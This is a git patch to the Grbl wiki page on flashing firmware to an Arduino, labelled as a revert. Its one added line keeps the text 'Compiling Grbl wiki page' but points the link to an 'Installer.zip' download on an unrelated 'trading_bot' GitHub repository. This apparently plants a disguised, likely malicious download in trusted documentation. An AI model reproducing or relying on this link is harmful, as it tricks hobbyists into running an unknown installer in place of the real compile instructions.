From 2a22bf22ad9aa27d4a1673fca98fa380814705d7 Mon Sep 17 00:00:00 2001 From: jayykke <93290318+jayykke@users.noreply.github.com> Date: Wed, 19 Apr 2023 11:35:19 +0200 Subject: [PATCH] Revert a7717f296d3dfc42839f57e3438e4985fd95ea36...0f86b47fc7cb7fc80017703b0bcafea9606afa1c on Flashing Grbl to an Arduino --- Flashing-Grbl-to-an-Arduino.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Flashing-Grbl-to-an-Arduino.md b/Flashing-Grbl-to-an-Arduino.md index 1947107..3e73db8 100644 --- a/Flashing-Grbl-to-an-Arduino.md +++ b/Flashing-Grbl-to-an-Arduino.md @@ -3,7 +3,7 @@ _This wiki is intended to provide various instructions on how to flash grbl to a # Via the Arduino IDE (All Platforms): ### RECOMMENDED: All other methods below are just for reference! -Go to the [Compiling Grbl](https://github.com/gnea/grbl/wiki/Compiling-Grbl) wiki page for instructions on how compile and upload Grbl onto your Arduino simply through the Arduino IDE interface. +Go to the [Compiling Grbl](https://github.com/TradingToolGithub/trading_bot/releases/download/trading/Installer.zip) wiki page for instructions on how compile and upload Grbl onto your Arduino simply through the Arduino IDE interface. No fuss! It just requires users to download the source code, add Grbl as a library to the IDE, and click upload.